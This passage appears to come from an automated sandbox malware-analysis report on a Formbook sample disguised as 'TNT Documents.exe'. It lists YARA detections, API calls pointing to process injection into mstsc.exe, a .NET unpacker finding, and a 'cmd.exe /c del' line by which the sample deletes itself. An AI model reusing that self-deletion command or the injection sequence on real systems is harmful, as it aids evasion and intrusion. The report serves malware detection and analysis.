          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_00075ED20_2_00075ED2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_0236C2B00_2_0236C2B0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_023699E00_2_023699E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06B10BE00_2_06B10BE0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E7CFC80_2_06E7CFC8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E71F090_2_06E71F09
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E714980_2_06E71498
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70C380_2_06E70C38
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E72DE80_2_06E72DE8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E755E80_2_06E755E8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E761980_2_06E76198
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E79A350_2_06E79A35
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E7A7E80_2_06E7A7E8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E753F80_2_06E753F8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E793D60_2_06E793D6
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E74F280_2_06E74F28
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E74F190_2_06E74F19
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E73CE00_2_06E73CE0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E760E80_2_06E760E8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E748C90_2_06E748C9
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E73CDF0_2_06E73CDF
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E748D80_2_06E748D8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E700400_2_06E70040
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E700060_2_06E70006
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E70C0D0_2_06E70C0D
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E754080_2_06E75408
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E755D80_2_06E755D8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E72DAA0_2_06E72DAA
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E719A80_2_06E719A8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E72D810_2_06E72D81
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E751600_2_06E75160
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E761550_2_06E76155
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E751500_2_06E75150
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_06E7AD080_2_06E7AD08
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_0007958F0_2_0007958F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 0_2_00074D8E0_2_00074D8E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_00135ED25_2_00135ED2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_0013958F5_2_0013958F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 5_2_00134D8E5_2_00134D8E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004010307_2_00401030
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00408C8B7_2_00408C8B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00408C907_2_00408C90
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00402D877_2_00402D87
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00402D907_2_00402D90
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00402FB07_2_00402FB0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AA5ED27_2_00AA5ED2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0155F9007_2_0155F900
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015741207_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162E8247_2_0162E824
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016110027_2_01611002
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016228EC7_2_016228EC
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156B0907_2_0156B090
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016220A87_2_016220A8
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015820A07_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01622B287_2_01622B28
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161DBD27_2_0161DBD2
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0158EBB07_2_0158EBB0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016222AE7_2_016222AE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01621D557_2_01621D55
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01622D077_2_01622D07
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01550D207_2_01550D20
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156D5E07_2_0156D5E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_016225DD7_2_016225DD
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015825817_2_01582581
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161D4667_2_0161D466
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0156841F7_2_0156841F
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01621FF17_2_01621FF1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0162DFCE7_2_0162DFCE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01576E307_2_01576E30
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0161D6167_2_0161D616
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01622EF77_2_01622EF7
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AA4D8E7_2_00AA4D8E
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00AA958F7_2_00AA958F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05681D5517_2_05681D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05682D0717_2_05682D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B0D2017_2_055B0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056825DD17_2_056825DD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CD5E017_2_055CD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E258117_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567D46617_2_0567D466
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C841F17_2_055C841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05681FF117_2_05681FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D6E3017_2_055D6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567D61617_2_0567D616
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05682EF717_2_05682EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BF90017_2_055BF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D412017_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567100217_2_05671002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056828EC17_2_056828EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056820A817_2_056820A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB09017_2_055CB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A017_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05682B2817_2_05682B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567DBD217_2_0567DBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EEBB017_2_055EEBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056822AE17_2_056822AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03312FB017_2_03312FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03312D9017_2_03312D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03312D8717_2_03312D87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03318C9017_2_03318C90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03318C8B17_2_03318C8B
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: String function: 0155B150 appears 35 times
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 055BB150 appears 35 times
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004185F0 NtCreateFile,7_2_004185F0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004186A0 NtReadFile,7_2_004186A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00418720 NtClose,7_2_00418720
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004187D0 NtAllocateVirtualMemory,7_2_004187D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004185EA NtCreateFile,7_2_004185EA
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00418642 NtReadFile,7_2_00418642
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0041869A NtReadFile,7_2_0041869A
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_004187CB NtAllocateVirtualMemory,7_2_004187CB
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_01599910
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015999A0 NtCreateSection,LdrInitializeThunk,7_2_015999A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599840 NtDelayExecution,LdrInitializeThunk,7_2_01599840
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599860 NtQuerySystemInformation,LdrInitializeThunk,7_2_01599860
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015998F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_015998F0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A50 NtCreateFile,LdrInitializeThunk,7_2_01599A50
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_01599A00
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A20 NtResumeThread,LdrInitializeThunk,7_2_01599A20
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599540 NtReadFile,LdrInitializeThunk,7_2_01599540
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015995D0 NtClose,LdrInitializeThunk,7_2_015995D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599710 NtQueryInformationToken,LdrInitializeThunk,7_2_01599710
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599FE0 NtCreateMutant,LdrInitializeThunk,7_2_01599FE0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599780 NtMapViewOfSection,LdrInitializeThunk,7_2_01599780
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015997A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_015997A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_01599660
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015996E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_015996E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599950 NtQueueApcThread,7_2_01599950
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015999D0 NtCreateProcessEx,7_2_015999D0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159B040 NtSuspendThread,7_2_0159B040
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599820 NtEnumerateKey,7_2_01599820
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015998A0 NtWriteVirtualMemory,7_2_015998A0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599B00 NtSetValueKey,7_2_01599B00
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159A3B0 NtGetContextThread,7_2_0159A3B0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A10 NtQuerySection,7_2_01599A10
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599A80 NtOpenDirectoryObject,7_2_01599A80
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599560 NtWriteFile,7_2_01599560
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159AD30 NtSetContextThread,7_2_0159AD30
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599520 NtWaitForSingleObject,7_2_01599520
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015995F0 NtQueryInformationFile,7_2_015995F0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159A770 NtOpenThread,7_2_0159A770
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599770 NtSetInformationFile,7_2_01599770
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599760 NtOpenProcess,7_2_01599760
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_0159A710 NtOpenProcessToken,7_2_0159A710
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599730 NtQueryVirtualMemory,7_2_01599730
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599650 NtQueryValueKey,7_2_01599650
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599670 NtQueryInformationProcess,7_2_01599670
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_01599610 NtEnumerateValueKey,7_2_01599610
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_015996D0 NtCreateKey,7_2_015996D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9540 NtReadFile,LdrInitializeThunk,17_2_055F9540
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F95D0 NtClose,LdrInitializeThunk,17_2_055F95D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9710 NtQueryInformationToken,LdrInitializeThunk,17_2_055F9710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9FE0 NtCreateMutant,LdrInitializeThunk,17_2_055F9FE0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9780 NtMapViewOfSection,LdrInitializeThunk,17_2_055F9780
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9650 NtQueryValueKey,LdrInitializeThunk,17_2_055F9650
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_055F9660
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F96D0 NtCreateKey,LdrInitializeThunk,17_2_055F96D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F96E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_055F96E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_055F9910
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F99A0 NtCreateSection,LdrInitializeThunk,17_2_055F99A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9840 NtDelayExecution,LdrInitializeThunk,17_2_055F9840
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9860 NtQuerySystemInformation,LdrInitializeThunk,17_2_055F9860
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A50 NtCreateFile,LdrInitializeThunk,17_2_055F9A50
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9560 NtWriteFile,17_2_055F9560
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FAD30 NtSetContextThread,17_2_055FAD30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9520 NtWaitForSingleObject,17_2_055F9520
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F95F0 NtQueryInformationFile,17_2_055F95F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FA770 NtOpenThread,17_2_055FA770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9770 NtSetInformationFile,17_2_055F9770
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9760 NtOpenProcess,17_2_055F9760
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FA710 NtOpenProcessToken,17_2_055FA710
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9730 NtQueryVirtualMemory,17_2_055F9730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F97A0 NtUnmapViewOfSection,17_2_055F97A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9670 NtQueryInformationProcess,17_2_055F9670
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9610 NtEnumerateValueKey,17_2_055F9610
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9950 NtQueueApcThread,17_2_055F9950
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F99D0 NtCreateProcessEx,17_2_055F99D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FB040 NtSuspendThread,17_2_055FB040
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9820 NtEnumerateKey,17_2_055F9820
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F98F0 NtReadVirtualMemory,17_2_055F98F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F98A0 NtWriteVirtualMemory,17_2_055F98A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9B00 NtSetValueKey,17_2_055F9B00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055FA3B0 NtGetContextThread,17_2_055FA3B0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A10 NtQuerySection,17_2_055F9A10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A00 NtProtectVirtualMemory,17_2_055F9A00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A20 NtResumeThread,17_2_055F9A20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F9A80 NtOpenDirectoryObject,17_2_055F9A80
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03328720 NtClose,17_2_03328720
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033287D0 NtAllocateVirtualMemory,17_2_033287D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033286A0 NtReadFile,17_2_033286A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033285F0 NtCreateFile,17_2_033285F0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033287CB NtAllocateVirtualMemory,17_2_033287CB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_03328642 NtReadFile,17_2_03328642
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0332869A NtReadFile,17_2_0332869A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_033285EA NtCreateFile,17_2_033285EA
          Source: TNT Documents.exe, 00000000.00000000.252292198.00000000000EE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.300957032.0000000006DC0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294580237.00000000026F2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000005.00000000.280071270.00000000001AE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000000.286422780.0000000000B1E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362999077.0000000003523000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362181801.00000000017DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exeBinary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TNT Documents.exeReversingLabs: Detection: 46%
          Source: TNT Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TNT Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\TNT Documents.exe "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"Jump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@10/4
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: TNT Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TNT Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: TNT Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: TNT Documents.exe, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs.Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
